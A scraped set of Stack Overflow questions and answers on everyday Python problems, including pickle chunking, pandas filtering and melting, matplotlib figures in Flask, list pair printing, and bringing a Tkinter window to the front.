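As a hedged alternative to the answer above, date limits can be expressed through the options dictionary rather than as an extra argument to extract_info; this sketch assumes youtube_dl's DateRange helper and the same placeholder search query, and whether a flat search result actually gets filtered depends on the extractor supplying an upload date.

import youtube_dl
from youtube_dl.utils import DateRange

ydl_opts = {
    'dump_single_json': True,
    'writeautomaticsub': True,
    'subtitleslangs': ['en'],
    'daterange': DateRange(end='20121231'),  # keep only uploads on or before 2012-12-31
}

with youtube_dl.YoutubeDL(ydl_opts) as ydl:
    result = ydl.extract_info('ytsearch100:iPhone 4', download=False)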
Q: why is the return of the program not good? I'm new to python and there's a video on Youtube that I watched. I do the exact same code as he but mine doesn't work and I don' understand why. Here's the code: MAX_LINES = 3 def deposit(): while True: amount = input("What would you like to deposit? $") if amount.isdigit(): amount = int(amount) if amount > 0: break else: print("Amount must be greater than 0. ") else: print("Please enter a number. ") return amount def get_number_of_lines(): while True: lines = input("Enter the number of lines to bet on (1-" + str(MAX_LINES) + ")? ") if lines.isdigit(): lines = int(lines) if 1 <= lines <= MAX_LINES: break else: print("Please enter a valid number of lines. ") else: print("Please enter a number. ") return lines There are 3 problems. Unindent amount does not match previous indent. I have no idea what does that mean "return" can be used only within a function. As far as I'm concerned I'm using it in the function, copied the first function then pasted it into the second function and somehow it doesn't work "lines" is not defined. What dou you mean it's not defined, I define it in the first line of the function https://www.youtube.com/watch?v=th4OBktqK1I This video's code what I'm trying to do I appreciate any help! I just simply don't understand why it works in one and not the other A: You have one space too much in front of while True in function get_number_of_lines(). Yes used in functions to return value Because function don't get inside while loop (because of indent problem), lines is never defined, probably this was the problem. So try fix indent and run again
why is the return of the program not good?
I'm new to python and there's a video on Youtube that I watched. I do the exact same code as he but mine doesn't work and I don' understand why. Here's the code: MAX_LINES = 3 def deposit(): while True: amount = input("What would you like to deposit? $") if amount.isdigit(): amount = int(amount) if amount > 0: break else: print("Amount must be greater than 0. ") else: print("Please enter a number. ") return amount def get_number_of_lines(): while True: lines = input("Enter the number of lines to bet on (1-" + str(MAX_LINES) + ")? ") if lines.isdigit(): lines = int(lines) if 1 <= lines <= MAX_LINES: break else: print("Please enter a valid number of lines. ") else: print("Please enter a number. ") return lines There are 3 problems. Unindent amount does not match previous indent. I have no idea what does that mean "return" can be used only within a function. As far as I'm concerned I'm using it in the function, copied the first function then pasted it into the second function and somehow it doesn't work "lines" is not defined. What dou you mean it's not defined, I define it in the first line of the function https://www.youtube.com/watch?v=th4OBktqK1I This video's code what I'm trying to do I appreciate any help! I just simply don't understand why it works in one and not the other
[ "\nYou have one space too much in front of while True in function get_number_of_lines().\nYes used in functions to return value\nBecause function don't get inside while loop (because of indent problem), lines is never defined, probably this was the problem.\n\nSo try fix indent and run again\n" ]
[ 0 ]
[]
[]
[ "python", "return" ]
stackoverflow_0074575758_python_return.txt
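For completeness, a corrected sketch of the two functions from the question with the while True line indented to match the rest of the function body, which is what the answer is pointing at; the prompts and limits are kept as in the video-based code.

MAX_LINES = 3

def deposit():
    while True:
        amount = input("What would you like to deposit? $")
        if amount.isdigit():
            amount = int(amount)
            if amount > 0:
                break
            print("Amount must be greater than 0.")
        else:
            print("Please enter a number.")
    return amount

def get_number_of_lines():
    while True:  # aligned with the function body, so the loop (and lines) is actually reached
        lines = input("Enter the number of lines to bet on (1-" + str(MAX_LINES) + ")? ")
        if lines.isdigit():
            lines = int(lines)
            if 1 <= lines <= MAX_LINES:
                break
            print("Please enter a valid number of lines.")
        else:
            print("Please enter a number.")
    return lines

if __name__ == "__main__":
    print(deposit(), get_number_of_lines())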
Q: How to load Pickle file in chunks? Is there any option to load a pickle file in chunks? I know we can save the data in CSV and load it in chunks. But other than CSV, is there any option to load a pickle file or any python native file in chunks? A: Based on the documentation for Python pickle, there is not currently support for chunking. However, it is possible to split data into chunks and then read in chunks. For example, suppose the original structure is import pickle filename = "myfile.pkl" str_to_save = "myname" with open(filename,'wb') as file_handle: pickle.dump(str_to_save, file_handle) with open(filename,'rb') as file_handle: result = pickle.load(file_handle) print(result) That could be split into two separate pickle files: import pickle filename_1 = "myfile_1.pkl" filename_2 = "myfile_2.pkl" str_to_save = "myname" with open(filename_1,'wb') as file_handle: pickle.dump(str_to_save[0:4], file_handle) with open(filename_2,'wb') as file_handle: pickle.dump(str_to_save[4:], file_handle) with open(filename_1,'rb') as file_handle: result = pickle.load(file_handle) print(result) As per AKX's comment, writing multiple data to a single file also works: import pickle filename = "myfile.pkl" str_to_save = "myname" with open(filename,'wb') as file_handle: pickle.dump(str_to_save[0:4], file_handle) pickle.dump(str_to_save[4:], file_handle) with open(filename,'rb') as file_handle: result = pickle.load(file_handle) print(result) result = pickle.load(file_handle) print(result) A: I had a similar issue, where I wrote a barrel file descriptor pool, and noticed that my pickle files were getting corrupt when I closed a file descriptor. Although you may do multiple dump() operations to an open file descriptor, it's not possible to subsequently do an open('file', 'ab') to start saving a new set of objects. I got around this by doing a pickler.dump(None) as a session terminator right before I had to close the file descriptor, and upon re-opening, I instantiated a new Pickler instance to resume writing to the file. When loading from this file, a None object signified an end-of-session, at which point I instantiated a new Pickler instance with the file descriptor to continue reading the remainder of the multi-session pickle file. This only applies if for some reason you have to close the file descriptor, though. Otherwise, any number of dump() calls can be performed for load() later. A: As far as I understand Pickle, load/dump by chunk is not possible. Pickle intrinsically reads a complete data stream by "chunks" of variable length depending on flags within the data stream. That is what serialization is all about. This datastream itself could have been cut in chunk earlier (say, network transfer), but chunks cannot be pickle/unpickled "on the fly". But maybe something intermediate can be achieved with pickle "buffers" and "out of band" features for very large data. Note this is not exactly a pickle load/save a single pickle file in chunks. It only applies to objects met during the serialization process that declare themselves has being "out of band" (serialized separately). Quoting the Pickler class doc: If buffer_callback is not None, then it can be called any number of times with a buffer view. If the callback returns a false value (such as None), the given buffer is out-of-band; otherwise the buffer is serialized in-band, i.e. inside the pickle stream. (emphasis mine) Quoting the "Out of band" concept doc: In some contexts, the pickle module is used to transfer massive amounts of data. 
Therefore, it can be important to minimize the number of memory copies, to preserve performance and resource consumption. However, normal operation of the pickle module, as it transforms a graph-like structure of objects into a sequential stream of bytes, intrinsically involves copying data to and from the pickle stream. This constraint can be eschewed if both the provider (the implementation of the object types to be transferred) and the consumer (the implementation of the communications system) support the out-of-band transfer facilities provided by pickle protocol 5 and higher. Example taken from the doc example : b = ZeroCopyByteArray(b"abc") # NB: class has a special __reduce_ex__ and _reconstruct method buffers = [] data = pickle.dumps(b, protocol=5, buffer_callback=buffers.append) # we could do things with these buffers like: # - writing each to a single file, # - sending them over network, # ... new_b = pickle.loads(data, buffers=buffers) # load in chunks From this example, we could consider writing each buffer into a file, or sending each on a network. Then unpickling would be performed by loading those files (or network payloads) and passing to the unpickle. But note that we end up with 2 serialized data in the example: data buffers Not really the OP desire, not exactly pickle load/dump by chunks. From a pickle-to-a-single-file perspective, I don't think this gives any benefit, because we would have to define a custom method to pack into a file both data and buffers, i.e. define a new data format ... feels like ruining the pickle initial benefits. Quoting Unpickler constructor doc: If buffers is not None, it should be an iterable of buffer-enabled objects that is consumed each time the pickle stream references an out-of-band buffer view. Such buffers have been given in order to the buffer_callback of a Pickler object. Changed in version 3.8: The buffers argument was added.
How to load Pickle file in chunks?
Is there any option to load a pickle file in chunks? I know we can save the data in CSV and load it in chunks. But other than CSV, is there any option to load a pickle file or any python native file in chunks?
[ "Based on the documentation for Python pickle, there is not currently support for chunking.\nHowever, it is possible to split data into chunks and then read in chunks. For example, suppose the original structure is\nimport pickle\n\nfilename = \"myfile.pkl\"\nstr_to_save = \"myname\"\n\nwith open(filename,'wb') as file_handle:\n pickle.dump(str_to_save, file_handle)\n \nwith open(filename,'rb') as file_handle:\n result = pickle.load(file_handle)\n\nprint(result)\n\nThat could be split into two separate pickle files:\nimport pickle\n\nfilename_1 = \"myfile_1.pkl\"\nfilename_2 = \"myfile_2.pkl\"\nstr_to_save = \"myname\"\n\nwith open(filename_1,'wb') as file_handle:\n pickle.dump(str_to_save[0:4], file_handle)\nwith open(filename_2,'wb') as file_handle:\n pickle.dump(str_to_save[4:], file_handle)\n \nwith open(filename_1,'rb') as file_handle:\n result = pickle.load(file_handle)\n\nprint(result)\n\nAs per AKX's comment, writing multiple data to a single file also works:\nimport pickle\n\nfilename = \"myfile.pkl\"\nstr_to_save = \"myname\"\n\nwith open(filename,'wb') as file_handle:\n pickle.dump(str_to_save[0:4], file_handle)\n pickle.dump(str_to_save[4:], file_handle)\n \nwith open(filename,'rb') as file_handle:\n result = pickle.load(file_handle)\n print(result)\n result = pickle.load(file_handle)\n print(result)\n\n", "I had a similar issue, where I wrote a barrel file descriptor pool, and noticed that my pickle files were getting corrupt when I closed a file descriptor. Although you may do multiple dump() operations to an open file descriptor, it's not possible to subsequently do an open('file', 'ab') to start saving a new set of objects.\nI got around this by doing a pickler.dump(None) as a session terminator right before I had to close the file descriptor, and upon re-opening, I instantiated a new Pickler instance to resume writing to the file.\nWhen loading from this file, a None object signified an end-of-session, at which point I instantiated a new Pickler instance with the file descriptor to continue reading the remainder of the multi-session pickle file.\nThis only applies if for some reason you have to close the file descriptor, though. Otherwise, any number of dump() calls can be performed for load() later.\n", "As far as I understand Pickle, load/dump by chunk is not possible.\nPickle intrinsically reads a complete data stream by \"chunks\" of variable length depending on flags within the data stream. That is what serialization is all about. This datastream itself could have been cut in chunk earlier (say, network transfer), but chunks cannot be pickle/unpickled \"on the fly\".\n\nBut maybe something intermediate can be achieved with pickle \"buffers\" and \"out of band\" features for very large data.\nNote this is not exactly a pickle load/save a single pickle file in chunks. It only applies to objects met during the serialization process that declare themselves has being \"out of band\" (serialized separately).\nQuoting the Pickler class doc:\n\nIf buffer_callback is not None, then it can be called any number of times with a buffer view. If the callback returns a false value (such as None), the given buffer is out-of-band; otherwise the buffer is serialized in-band, i.e. inside the pickle stream.\n(emphasis mine)\n\nQuoting the \"Out of band\" concept doc:\n\nIn some contexts, the pickle module is used to transfer massive amounts of data. Therefore, it can be important to minimize the number of memory copies, to preserve performance and resource consumption. 
However, normal operation of the pickle module, as it transforms a graph-like structure of objects into a sequential stream of bytes, intrinsically involves copying data to and from the pickle stream.\n\n\nThis constraint can be eschewed if both the provider (the implementation of the object types to be transferred) and the consumer (the implementation of the communications system) support the out-of-band transfer facilities provided by pickle protocol 5 and higher.\n\nExample taken from the doc example :\nb = ZeroCopyByteArray(b\"abc\") # NB: class has a special __reduce_ex__ and _reconstruct method\nbuffers = []\ndata = pickle.dumps(b, protocol=5, buffer_callback=buffers.append)\n# we could do things with these buffers like:\n# - writing each to a single file,\n# - sending them over network,\n# ...\nnew_b = pickle.loads(data, buffers=buffers) # load in chunks\n\nFrom this example, we could consider writing each buffer into a file, or sending each on a network. Then unpickling would be performed by loading those files (or network payloads) and passing to the unpickle.\nBut note that we end up with 2 serialized data in the example:\n\ndata\nbuffers\n\nNot really the OP desire, not exactly pickle load/dump by chunks.\nFrom a pickle-to-a-single-file perspective, I don't think this gives any benefit, because we would have to define a custom method to pack into a file both data and buffers, i.e. define a new data format ... feels like ruining the pickle initial benefits.\n\nQuoting Unpickler constructor doc:\n\nIf buffers is not None, it should be an iterable of buffer-enabled objects that is consumed each time the pickle stream references an out-of-band buffer view. Such buffers have been given in order to the buffer_callback of a Pickler object.\nChanged in version 3.8: The buffers argument was added.\n\n" ]
[ 0, 0, 0 ]
[]
[]
[ "chunks", "csv", "file", "pickle", "python" ]
stackoverflow_0059983073_chunks_csv_file_pickle_python.txt
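Building on the first answer's point that several dump() calls can share one file, here is a small runnable sketch of the closest thing plain pickle offers to chunked loading: write each chunk as its own frame, then read frames back until EOF; chunks.pkl is a throwaway file name.

import pickle

chunks = [list(range(1000)), list(range(1000, 2000)), list(range(2000, 3000))]

# Write each chunk as a separate pickle frame in one file.
with open('chunks.pkl', 'wb') as fh:
    for chunk in chunks:
        pickle.dump(chunk, fh)

# Read the frames back one at a time; only one chunk is materialised per iteration.
loaded = []
with open('chunks.pkl', 'rb') as fh:
    while True:
        try:
            loaded.append(pickle.load(fh))
        except EOFError:   # no more frames left in the file
            break

print(len(loaded), loaded[0][:3], loaded[-1][-3:])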
Q: Passing a string to pandas.loc There is a pandas data frame for which it is required make a subset using multiple conditions. This works when the conditions are hard-coded: subset_frame = data_frame.loc[(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)] The conditions vary and a function is being created for whatever list of conditions is supplied. A string is produced by the function: mystring = "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" This is fed into .loc: subset_frame= data_frame.loc[mystring] Which returns an error: KeyError: "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" As per first example with subset_frame above, this exact text, copied from the KeyError output and pasted/hard-coded into .loc, runs successfully. A different method, .update, has also been attempted: data_frame.update(data_frame.loc[mystring]) This returns the same error. What is the mistake in my code or my approach? A: You need to use eval : mystring = "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" subset_frame= data_frame.loc[eval(mystring)]
Passing a string to pandas.loc
There is a pandas data frame for which it is required to make a subset using multiple conditions. This works when the conditions are hard-coded: subset_frame = data_frame.loc[(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)] The conditions vary and a function is being created for whatever list of conditions is supplied. A string is produced by the function: mystring = "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" This is fed into .loc: subset_frame= data_frame.loc[mystring] Which returns an error: KeyError: "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" As per the first example with subset_frame above, this exact text, copied from the KeyError output and pasted/hard-coded into .loc, runs successfully. A different method, .update, has also been attempted: data_frame.update(data_frame.loc[mystring]) This returns the same error. What is the mistake in my code or my approach?
[ "You need to use eval :\nmystring = \"(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)\"\n\nsubset_frame= data_frame.loc[eval(mystring)]\n\n" ]
[ 1 ]
[]
[]
[ "pandas", "python", "string" ]
stackoverflow_0074575882_pandas_python_string.txt
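Alongside the eval-based answer, DataFrame.query evaluates a condition string that only names columns, which avoids handing arbitrary text to Python's eval; the two-column frame below is made-up sample data shaped like the question's.

import pandas as pd

data_frame = pd.DataFrame({
    'Quantity': [3, 8, 10, 2],
    'Discount': [0.0, 0.1, 0.0, 0.2],
})

# eval-based form from the answer:
mystring = "(data_frame['Quantity'] > 5) & (data_frame['Discount'] > 0)"
subset_eval = data_frame.loc[eval(mystring)]

# query-based form: the string refers to column names only, not to the frame itself
condition = "Quantity > 5 and Discount > 0"
subset_query = data_frame.query(condition)

print(subset_eval.equals(subset_query))   # True for this sample data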
Q: Graphs overlap each other when showing them in a Flask application I would like to show multiple graphs on a webpage, build with flask. The graphs work fine when I run them separately, but when I try to show them on the same page, they overlap. main.py @main.route('/filetypebarchart', methods=["GET"]) def filetypebarchart(): fig1 =plt.figure("1") df = pd.read_csv('./export_dataframe.csv') df.value_counts() fig1 = df.type.value_counts().plot(kind = 'barh').get_figure() fig1.savefig('./project/filetypebarchart.png') return send_file("filetypebarchart.png",mimetype='img/png') @main.route('/filetypesum', methods=["GET"]) def filetypesum(): fig2 = plt.figure("2") df = pd.read_csv('./export_dataframe.csv') fig2 = sns.barplot(data=df, x="type", y="size", estimator="sum", palette="pastel") fig2.figure.savefig('./project/filetypesum.png') return send_file("filetypesum.png",mimetype='img/png') html code <div> <img src="/filetypebarchart" alt="Chart" height="auto" width="100%"> <br><br> <img src="/filetypesum" alt="Chart" height="auto" width="100%"> </div> The outcome A: Ooh meanwhile, I found out myself. I needed to add the following line to close the plot. plt.close(fig1) So now it looks like this. @main.route('/filetypebarchart', methods=["GET"]) def filetypebarchart(): fig1 =plt.figure("1") df = pd.read_csv('./export_dataframe.csv') df.value_counts() fig1 = df.type.value_counts().plot(kind = 'barh').get_figure() fig1.savefig('./project/filetypebarchart.png') plt.close(fig1) return send_file("filetypebarchart.png",mimetype='img/png')
Graphs overlap each other when showing them in a Flask application
I would like to show multiple graphs on a webpage, build with flask. The graphs work fine when I run them separately, but when I try to show them on the same page, they overlap. main.py @main.route('/filetypebarchart', methods=["GET"]) def filetypebarchart(): fig1 =plt.figure("1") df = pd.read_csv('./export_dataframe.csv') df.value_counts() fig1 = df.type.value_counts().plot(kind = 'barh').get_figure() fig1.savefig('./project/filetypebarchart.png') return send_file("filetypebarchart.png",mimetype='img/png') @main.route('/filetypesum', methods=["GET"]) def filetypesum(): fig2 = plt.figure("2") df = pd.read_csv('./export_dataframe.csv') fig2 = sns.barplot(data=df, x="type", y="size", estimator="sum", palette="pastel") fig2.figure.savefig('./project/filetypesum.png') return send_file("filetypesum.png",mimetype='img/png') html code <div> <img src="/filetypebarchart" alt="Chart" height="auto" width="100%"> <br><br> <img src="/filetypesum" alt="Chart" height="auto" width="100%"> </div> The outcome
[ "Ooh meanwhile, I found out myself.\nI needed to add the following line to close the plot.\nplt.close(fig1)\n\nSo now it looks like this.\n@main.route('/filetypebarchart', methods=[\"GET\"])\ndef filetypebarchart():\n fig1 =plt.figure(\"1\")\n\n df = pd.read_csv('./export_dataframe.csv') \n \n df.value_counts()\n fig1 = df.type.value_counts().plot(kind = 'barh').get_figure()\n fig1.savefig('./project/filetypebarchart.png')\n\n plt.close(fig1)\n\n return send_file(\"filetypebarchart.png\",mimetype='img/png')\n\n" ]
[ 0 ]
[]
[]
[ "flask", "matplotlib", "python" ]
stackoverflow_0074575666_flask_matplotlib_python.txt
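An alternative sketch for one of the routes above, built on an explicit matplotlib Figure instead of the shared pyplot state, so no plt.close bookkeeping is needed; it assumes the same main blueprint, CSV file and ./project output directory as in the question.

import pandas as pd
from flask import send_file
from matplotlib.figure import Figure

@main.route('/filetypebarchart', methods=["GET"])
def filetypebarchart():
    df = pd.read_csv('./export_dataframe.csv')

    fig = Figure()   # a fresh, request-local figure: nothing global to leak between routes
    ax = fig.subplots()
    df.type.value_counts().plot(kind='barh', ax=ax)

    fig.savefig('./project/filetypebarchart.png')
    return send_file("filetypebarchart.png", mimetype='img/png')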
Q: Print every two pairs in a new line from array of elements in Python How can I print from an array of elements in Python every second pair of elements one below another, without commas and brackets? My array looks like this: m=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] And, I want to print in one of the cases: 1 2 5 6 9 10 or in another case: 3 4 7 8 11 12 I didn't know how to do that, so i created two separate arrays, but when i try to print elements in separate rows, each pair has brackets and coma. Is there any way to solve this easier and to make it look as i wrote? What I've tried: a=[m[j:j+2] for j in range(0,len(m),2)] a1=m[::2] a2=m[1::2] if s1>s2: print("\n".join(map(str,a1))) elif s1<s2: print("\n".join(map(str,a2))) My current output: [3, 4] [7, 8] [11, 12] A: You could use a while loop m = [1,2,3,4,5,6,7,8,9] idx = 0 try: while idx < len: print(m[idx], m[idx+1]) idx += 3 except IndexError: print("Index out of bounds") Just change the start Index (idx) for the other print A: Another way to do it like this- m=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] pairs = [[i, i+1] for i in m[::2]] results = [], [] for i, e in enumerate(pairs): results[i%2].append(e) for i in results: for p in i: print(*p) print("-----") Output: 1 2 5 6 9 10 ----- 3 4 7 8 11 12 ----- A: I don't understand why all the solutions are so complex, this is as simple as follows (case 1): len_m = len(m) for i in range(0, len_m - 1 if len_m & 1 else len_m, 4): print(f"{m[i]} {m[i + 1]}") For case 2, just start the range with 2. A: what you are trying to achieve is making a pair of 2 in array and save alternative pair in a different arrays/list. one way of achiving this is below code, by going step by step. m=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] make_pair = [(m[i], m[i+1]) for i in range(0, len(m), 2)] res1 = [] res2 = [] print(make_pair) # [(1, 2), (3, 4), (5, 6), (7, 8), (9, 10), (11, 12)] for i in range(len(make_pair)): if i%2: res2.append(make_pair[i]) else: res1.append(make_pair[i]) print(res1) # [(1, 2), (5, 6), (9, 10)] print(res2) # [(3, 4), (7, 8), (11, 12)] if you want to go in one go, ie without creating pair array, then using temporary stack you can achieve same result
Print every two pairs in a new line from array of elements in Python
How can I print from an array of elements in Python every second pair of elements one below another, without commas and brackets? My array looks like this: m=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] And, I want to print in one of the cases: 1 2 5 6 9 10 or in another case: 3 4 7 8 11 12 I didn't know how to do that, so I created two separate arrays, but when I try to print elements in separate rows, each pair has brackets and a comma. Is there any easier way to solve this and make it look as I wrote? What I've tried: a=[m[j:j+2] for j in range(0,len(m),2)] a1=m[::2] a2=m[1::2] if s1>s2: print("\n".join(map(str,a1))) elif s1<s2: print("\n".join(map(str,a2))) My current output: [3, 4] [7, 8] [11, 12]
[ "You could use a while loop\nm = [1,2,3,4,5,6,7,8,9] \nidx = 0\ntry:\n while idx < len:\n print(m[idx], m[idx+1]) \n idx += 3\nexcept IndexError:\n print(\"Index out of bounds\") \n\nJust change the start Index (idx) for the other print\n", "Another way to do it like this-\nm=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\npairs = [[i, i+1] for i in m[::2]]\nresults = [], []\nfor i, e in enumerate(pairs):\n results[i%2].append(e)\n\nfor i in results:\n for p in i:\n print(*p)\n print(\"-----\")\n\nOutput:\n1 2\n5 6\n9 10\n-----\n3 4\n7 8\n11 12\n-----\n\n", "I don't understand why all the solutions are so complex, this is as simple as follows (case 1):\nlen_m = len(m)\nfor i in range(0, len_m - 1 if len_m & 1 else len_m, 4):\n print(f\"{m[i]} {m[i + 1]}\")\n\nFor case 2, just start the range with 2.\n", "what you are trying to achieve is making a pair of 2 in array and save alternative pair in a different arrays/list. one way of achiving this is below code, by going step by step.\nm=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\nmake_pair = [(m[i], m[i+1]) for i in range(0, len(m), 2)]\n\nres1 = []\nres2 = []\n\nprint(make_pair)\n# [(1, 2), (3, 4), (5, 6), (7, 8), (9, 10), (11, 12)]\nfor i in range(len(make_pair)):\n if i%2:\n res2.append(make_pair[i])\n else:\n res1.append(make_pair[i])\n\n\nprint(res1)\n# [(1, 2), (5, 6), (9, 10)]\nprint(res2)\n# [(3, 4), (7, 8), (11, 12)]\n\nif you want to go in one go, ie without creating pair array, then using temporary stack you can achieve same result\n" ]
[ 0, 0, 0, 0 ]
[]
[]
[ "arrays", "printing", "python", "python_3.x" ]
stackoverflow_0074575687_arrays_printing_python_python_3.x.txt
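A compact sketch of the slicing idea behind the answers above: stepping through the list four indices at a time yields exactly the alternating pairs, using the sample list m from the question.

m = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]

# First case: pairs starting at index 0 -> 1 2 / 5 6 / 9 10
for i in range(0, len(m) - 1, 4):
    print(m[i], m[i + 1])

# Second case: pairs starting at index 2 -> 3 4 / 7 8 / 11 12
for i in range(2, len(m) - 1, 4):
    print(m[i], m[i + 1])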
Q: Keys and Values as two columns? I have a data frame with several columns. Each of the column headers is a unique category and the rows below it contain a list of items in that category. I would like to transform it into two columns. Ideally, the first column would have all of the items listed and the second column would have the corresponding category. I feel like this should be simple but I'm hitting a brick wall. A: You can use pandas.melt function for that : import pandas as pd df = pd.DataFrame({ "Birds": ["Eagle", "Swan", "Robi"], "Fish": ["cod", "salmon", "Haddock"], "Farm animals": ["Pig", "horse", "hen"] }) df df = df.melt(value_vars=df.columns).rename(columns={"variable": "Categories", "value": "Animals"}) df
Keys and Values as two columns?
I have a data frame with several columns. Each of the column headers is a unique category and the rows below it contain a list of items in that category. I would like to transform it into two columns. Ideally, the first column would have all of the items listed and the second column would have the corresponding category. I feel like this should be simple but I'm hitting a brick wall.
[ "You can use pandas.melt function for that :\nimport pandas as pd\n\ndf = pd.DataFrame({\n \"Birds\": [\"Eagle\", \"Swan\", \"Robi\"],\n \"Fish\": [\"cod\", \"salmon\", \"Haddock\"],\n \"Farm animals\": [\"Pig\", \"horse\", \"hen\"]\n})\n\ndf\n\n\ndf = df.melt(value_vars=df.columns).rename(columns={\"variable\": \"Categories\", \"value\": \"Animals\"})\ndf\n\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074575564_dataframe_pandas_python.txt
Q: How to make a Tkinter window jump to the front? How do I get a Tkinter application to jump to the front? Currently, the window appears behind all my other windows and doesn't get focus. Is there some method I should be calling? A: Assuming you mean your application windows when you say "my other windows", you can use the lift() method on a Toplevel or Tk: root.lift() If you want the window to stay above all other windows, use: root.attributes("-topmost", True) Where root is your Toplevel or Tk. Don't forget the - infront of "topmost"! To make it temporary, disable topmost right after: def raise_above_all(window): window.attributes('-topmost', 1) window.attributes('-topmost', 0) Just pass in the window you want to raise as a argument, and this should work. A: Add the following lines before the mainloop(): root.lift() root.attributes('-topmost',True) root.after_idle(root.attributes,'-topmost',False) It works perfectly for me. It makes the window come to the front when the window is generated, and it won't keep it always be in the front. A: If you're doing this on a Mac, use AppleEvents to give focus to Python. Eg: import os os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''') A: Regarding the Mac, I noticed there can be a problem in that if there are multiple python GUIs running, every process will be named "Python" and AppleScript will tend to promote the wrong one to the front. Here's my solution. The idea is to grab a list of running process IDs before and after you load Tkinter. (Note that these are AppleScript process IDs which seem to bear no relation to their posix counterparts. Go figure.) Then the odd man out will be yours and you move that one to frontmost. (I didn't think that loop at the end would be necessary, but if you simply get every process whose ID is procID, AppleScript apparently returns the one object identified by name, which of course is that non-unique "Python", so we are back to square one unless there's something I'm missing.) import Tkinter, subprocess def applescript(script): return subprocess.check_output(['/usr/bin/osascript', '-e', script]) def procidset(): return set(applescript( 'tell app "System Events" to return id of every process whose name is "Python"' ).replace(',','').split()) idset = procidset() root = Tkinter.Tk() procid = iter(procidset() - idset).next() applescript(''' tell app "System Events" repeat with proc in every process whose name is "Python" if id of proc is ''' + procid + ''' then set frontmost of proc to true exit repeat end if end repeat end tell''') A: On Mac OS X PyObjC provides a cleaner and less error prone method than shelling out to osascript: import os from Cocoa import NSRunningApplication, NSApplicationActivateIgnoringOtherApps app = NSRunningApplication.runningApplicationWithProcessIdentifier_(os.getpid()) app.activateWithOptions_(NSApplicationActivateIgnoringOtherApps) A: Recently, I had the same question on the Mac. 
I have combined several answers using @MagerValp for the Mac and @D K for other systems: import platform if platform.system() != 'Darwin': root.lift() root.call('wm', 'attributes', '.', '-topmost', True) root.after_idle(root.call, 'wm', 'attributes', '.', '-topmost', False) else: import os from Cocoa import NSRunningApplication, NSApplicationActivateIgnoringOtherApps app = NSRunningApplication.runningApplicationWithProcessIdentifier_(os.getpid()) app.activateWithOptions_(NSApplicationActivateIgnoringOtherApps) root.mainloop() A: Somewhat of a combination of various other methods, this works on OS X 10.11, and Python 3.5.1 running in a venv, and should work on other platforms too. It also targets the app by process id rather than app name. from tkinter import Tk import os import subprocess import platform def raise_app(root: Tk): root.attributes("-topmost", True) if platform.system() == 'Darwin': tmpl = 'tell application "System Events" to set frontmost of every process whose unix id is {} to true' script = tmpl.format(os.getpid()) output = subprocess.check_call(['/usr/bin/osascript', '-e', script]) root.after(0, lambda: root.attributes("-topmost", False)) You call it right before the mainloop() call, like so: raise_app(root) root.mainloop() A: There's a hint on how to make the Tkinter window take focus when you call mainloop() in the Tkinter._test() function. # The following three commands are needed so the window pops # up on top on Windows... root.iconify() root.update() root.deiconify() root.mainloop() This is the cleanest most proper way I've found to do this, but it's only needed for Windows systems. A: This answer is to make one Tkinter Window pop up overtop of other Tkinter windows. In my app I have a large window toplevel which calls a much smaller window top2 which initially appears on top of toplevel. If user clicks within toplevel window it gains focus and smothers much smaller top2 window until toplevel window is dragged off of it. The solution is to click the button in toplevel to launch top2 again. The top2 open function knows it is already running so simply lifts it to the top and gives it focus: def play_items(self): ''' Play 1 or more songs in listbox.selection(). Define buttons: Close, Pause, Prev, Next, Commercial and Intermission ''' if self.top2_is_active is True: self.top2.focus_force() # Get focus self.top2.lift() # Raise in stacking order root.update() return # Don't want to start playing again A: On macOS High Sierra, py3.6.4, here is my solution: def OnFocusIn(event): if type(event.widget).__name__ == 'Tk': event.widget.attributes('-topmost', False) # Create and configure your root ... root.attributes('-topmost', True) root.focus_force() root.bind('<FocusIn>', OnFocusIn) The idea is to bring it to the front until user interacts with it, i.e., taking focus. I tried the accepted answer, .after_idle(), and .after(). They all fail in one case: When I run my script directly from an IDE like PyCharm, the app window will stay behind. My solution works in all the cases that I encountered. A: This will lift the window to the front, and also focus on the window. 
def lift_window(window): window.attributes('-topmost',True) window.attributes('-topmost',False) # disable the topmost attribute after it is at the front to prevent permanent focus window.focus_force() # focus to the window A: One more line (needed for Python 3.11 and tkinter 8.6): def lift_window(window): window.attributes('-topmost', True) window.update_idletasks() # get window on top window.attributes('-topmost', False) # prevent permanent focus window.focus_force() # focus to the window
How to make a Tkinter window jump to the front?
How do I get a Tkinter application to jump to the front? Currently, the window appears behind all my other windows and doesn't get focus. Is there some method I should be calling?
[ "Assuming you mean your application windows when you say \"my other windows\", you can use the lift() method on a Toplevel or Tk:\nroot.lift()\n\nIf you want the window to stay above all other windows, use: \nroot.attributes(\"-topmost\", True)\n\nWhere root is your Toplevel or Tk. Don't forget the - infront of \"topmost\"!\nTo make it temporary, disable topmost right after:\ndef raise_above_all(window):\n window.attributes('-topmost', 1)\n window.attributes('-topmost', 0)\n\nJust pass in the window you want to raise as a argument, and this should work.\n", "Add the following lines before the mainloop():\nroot.lift()\nroot.attributes('-topmost',True)\nroot.after_idle(root.attributes,'-topmost',False)\n\nIt works perfectly for me. It makes the window come to the front when the window is generated, and it won't keep it always be in the front.\n", "If you're doing this on a Mac, use AppleEvents to give focus to Python. Eg:\nimport os\n\nos.system('''/usr/bin/osascript -e 'tell app \"Finder\" to set frontmost of process \"Python\" to true' ''')\n\n", "Regarding the Mac, I noticed there can be a problem in that if there are multiple python GUIs running, every process will be named \"Python\" and AppleScript will tend to promote the wrong one to the front. Here's my solution. The idea is to grab 